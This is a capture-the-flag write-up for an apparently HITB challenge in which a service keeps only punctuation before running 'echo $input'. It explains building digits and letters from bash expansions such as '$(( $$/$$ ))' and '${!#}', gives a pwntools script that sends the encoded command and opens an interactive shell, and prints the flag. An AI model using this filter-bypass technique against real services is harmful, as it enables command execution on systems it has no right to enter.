Arbitrary shell commands can be created by using only punctuation in a service that filters all characters except for punctuation.

Challenge Description

nc 47.75.148.60 9999


nc 47.75.148.60 9999

Points

266 Points

56 Solved

Solution

The service filters all characters except punctuation before running:

echo $input

Thus, the objective is to figure out a way to create letters from only punctuation characters.

We can make numbers with the following primitive (1):

$(( $$/$$ ))

Next, we can get the string “runsh” in:

${!#}

Now, we can extract letters from the string by using subscripts.

The solution script by Quanyang:

from pwn import *
context(arch = 'i386', os = 'linux')

r = remote('47.75.148.60', 9999)
# EXPLOIT CODE GOES HERE
print r.recvuntil("Input:")
_1 = "$(( $$/$$ ))"
_2 = "$(( ($$/$$)+($$/$$) ))"
_3 = "$(( ($$/$$)+($$/$$)+($$/$$) ))"
_4 = "$(( ($$/$$)+($$/$$)+($$/$$)+($$/$$) ))"
_5 = "$(( ($$/$$)+($$/$$)+($$/$$)+($$/$$)+($$/$$) ))"
_6 = "$(( ($$/$$)+($$/$$)+($$/$$)+($$/$$)+($$/$$)+($$/$$) ))"
_7 = "$(( ($$/$$)+($$/$$)+($$/$$)+($$/$$)+($$/$$)+($$/$$)+($$/$$) ))"
_8 = "$(( ($$/$$)+($$/$$)+($$/$$)+($$/$$) +($$/$$)+($$/$$)+($$/$$)+($$/$$)))"
_9 = "$(( ($$/$$)+($$/$$)+($$/$$)+($$/$$)+($$/$$)+($$/$$)+($$/$$)+($$/$$)+($$/$$) ))"
_0 = "${#}"
chars = {"r":"${!#:2:1}","u":"${!#:3:1}","n":"${!#:4:1}","s":"${!#:6:1}",
         "h":"${!#:7:1}","B":"${-:1}"}

def format(cmd):
    for i in cmd:
        if i in chars:
            cmd = cmd.replace(i,chars[i])
    cmd = cmd.replace("1",_1).replace("2",_2).replace("3",_3).replace("4",_4)
    cmd = cmd.replace("5",_5).replace("6",_6).replace("7",_7).replace("8",_8)
    cmd = cmd.replace("9",_9).replace("0",_0)
    return cmd
cmd = raw_input()
r.sendline(format(cmd))
r.interactive()

Running the above script and executing sh will give us a shell to find the flag.

Flag: HITB{d7dc2f3c59291946abc768d74367ec31}

Leave a Comment